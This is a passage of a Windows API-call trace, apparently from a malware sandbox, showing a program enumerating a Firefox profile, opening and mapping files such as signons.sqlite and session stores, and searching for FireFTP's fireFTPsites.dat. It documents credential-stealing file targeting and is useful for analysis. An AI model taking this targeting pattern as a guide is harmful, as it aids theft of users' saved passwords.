lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x2ed9860, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak") returned 0x5d [0590.419] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.419] CloseHandle (hObject=0x4c8) returned 1 [0590.419] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.419] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbba [0590.419] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.419] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.420] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.420] StrStrIW (lpFirst="sessionstore.bak", lpSrch="fireFTPsites.dat") returned 0x0 [0590.420] LocalFree (hMem=0x56cab0) returned 0x0 [0590.420] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.420] lstrlenW (lpString="\\") returned 1 [0590.420] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.420] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.420] lstrlenW (lpString="sessionstore.js") returned 15 [0590.420] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.420] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56cab0 [0590.420] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.420] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.420] CloseHandle (hObject=0x4c8) returned 1 [0590.420] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5c [0590.420] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x2ed9860 [0590.420] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x2ed9860, nSize=0x5c | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js") returned 0x5c [0590.420] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.420] CloseHandle (hObject=0x4c8) returned 1 [0590.420] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.420] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23c [0590.420] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.420] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.421] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.421] StrStrIW (lpFirst="sessionstore.js", lpSrch="fireFTPsites.dat") returned 0x0 [0590.421] LocalFree (hMem=0x56cab0) returned 0x0 [0590.421] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.421] lstrlenW (lpString="\\") returned 1 [0590.421] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.421] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.421] lstrlenW (lpString="signons.sqlite") returned 14 [0590.421] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.421] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.421] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.421] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.421] CloseHandle (hObject=0x4c8) returned 1 [0590.421] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.421] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2ed9860 [0590.421] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x2ed9860, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite") returned 0x5b [0590.421] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.421] CloseHandle (hObject=0x4c8) returned 1 [0590.421] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.421] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x50000 [0590.421] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.421] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x24c0000 [0590.424] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.424] StrStrIW (lpFirst="signons.sqlite", lpSrch="fireFTPsites.dat") returned 0x0 [0590.424] LocalFree (hMem=0x56cab0) returned 0x0 [0590.424] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.424] lstrlenW (lpString="\\") returned 1 [0590.424] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.424] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.424] lstrlenW (lpString="times.json") returned 10 [0590.424] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.424] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63bbf0 [0590.424] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.424] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.424] CloseHandle (hObject=0x4c8) returned 1 [0590.424] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0590.424] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63bd28 [0590.424] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x63bd28, nSize=0x57 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json") returned 0x57 [0590.425] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.425] CloseHandle (hObject=0x4c8) returned 1 [0590.425] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.425] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d [0590.425] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.425] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.425] LocalFree (hMem=0x63bd28) returned 0x0 [0590.425] StrStrIW (lpFirst="times.json", lpSrch="fireFTPsites.dat") returned 0x0 [0590.425] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.425] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.425] lstrlenW (lpString="\\") returned 1 [0590.425] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.425] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.425] lstrlenW (lpString="urlclassifierkey3.txt") returned 21 [0590.425] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.425] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x5e6108 [0590.425] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.425] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.425] CloseHandle (hObject=0x4c8) returned 1 [0590.425] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x62 [0590.425] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x63f8c8 [0590.425] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x63f8c8, nSize=0x62 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt") returned 0x62 [0590.425] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.425] CloseHandle (hObject=0x4c8) returned 1 [0590.426] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.426] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9a [0590.426] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.426] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.426] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.426] StrStrIW (lpFirst="urlclassifierkey3.txt", lpSrch="fireFTPsites.dat") returned 0x0 [0590.426] LocalFree (hMem=0x5e6108) returned 0x0 [0590.426] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.426] lstrcmpiW (lpString1="weave", lpString2=".") returned 1 [0590.426] lstrcmpiW (lpString1="weave", lpString2="..") returned 1 [0590.426] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.426] lstrlenW (lpString="\\") returned 1 [0590.426] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.426] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.426] lstrlenW (lpString="weave") returned 5 [0590.426] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.426] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x63bbf0 [0590.426] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.426] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.426] lstrlenW (lpString="\\*.*") returned 4 [0590.426] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.426] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bd28 [0590.426] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*.*", lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 0x57ca60 [0590.426] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.426] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.426] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.426] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.426] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.426] lstrcmpiW (lpString1="changes", lpString2=".") returned 1 [0590.426] lstrcmpiW (lpString1="changes", lpString2="..") returned 1 [0590.426] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.426] lstrlenW (lpString="\\") returned 1 [0590.426] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.426] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63be60 [0590.427] lstrlenW (lpString="changes") returned 7 [0590.427] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.427] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.427] LocalFree (hMem=0x63be60) returned 0x0 [0590.427] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0590.427] lstrlenW (lpString="\\*.*") returned 4 [0590.427] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0590.427] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ed9860 [0590.427] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*.*", lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 0x57c9a0 [0590.427] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.427] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 1 [0590.427] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.427] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.427] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 0 [0590.427] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.427] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.427] LocalFree (hMem=0x56cab0) returned 0x0 [0590.427] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.427] lstrcmpiW (lpString1="failed", lpString2=".") returned 1 [0590.427] lstrcmpiW (lpString1="failed", lpString2="..") returned 1 [0590.427] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.427] lstrlenW (lpString="\\") returned 1 [0590.427] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.427] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63be60 [0590.427] lstrlenW (lpString="failed") returned 6 [0590.427] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.427] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.427] LocalFree (hMem=0x63be60) returned 0x0 [0590.427] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0590.427] lstrlenW (lpString="\\*.*") returned 4 [0590.427] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0590.427] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ed9860 [0590.427] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*.*", lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 0x57c9a0 [0590.427] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.427] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 1 [0590.427] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.427] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.427] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 0 [0590.427] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.427] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.427] LocalFree (hMem=0x56cab0) returned 0x0 [0590.427] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.427] lstrcmpiW (lpString1="toFetch", lpString2=".") returned 1 [0590.428] lstrcmpiW (lpString1="toFetch", lpString2="..") returned 1 [0590.428] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.428] lstrlenW (lpString="\\") returned 1 [0590.428] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.428] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63be60 [0590.428] lstrlenW (lpString="toFetch") returned 7 [0590.428] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.428] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.428] LocalFree (hMem=0x63be60) returned 0x0 [0590.428] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0590.428] lstrlenW (lpString="\\*.*") returned 4 [0590.428] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0590.428] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ed9860 [0590.428] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*.*", lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 0x57c9a0 [0590.428] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.428] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 1 [0590.428] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.428] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.428] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 0 [0590.428] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.428] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.428] LocalFree (hMem=0x56cab0) returned 0x0 [0590.428] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 0 [0590.428] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.428] LocalFree (hMem=0x63bd28) returned 0x0 [0590.428] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.428] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.428] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0590.428] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0590.428] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.428] lstrlenW (lpString="\\") returned 1 [0590.428] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.428] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.428] lstrlenW (lpString="webapps") returned 7 [0590.428] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.428] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bbf0 [0590.428] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.428] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.428] lstrlenW (lpString="\\*.*") returned 4 [0590.428] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.428] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.428] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*.*", lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 0x57ca60 [0590.428] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.428] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.428] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.429] lstrcmpiW (lpString1="..", lpString2="..") returned 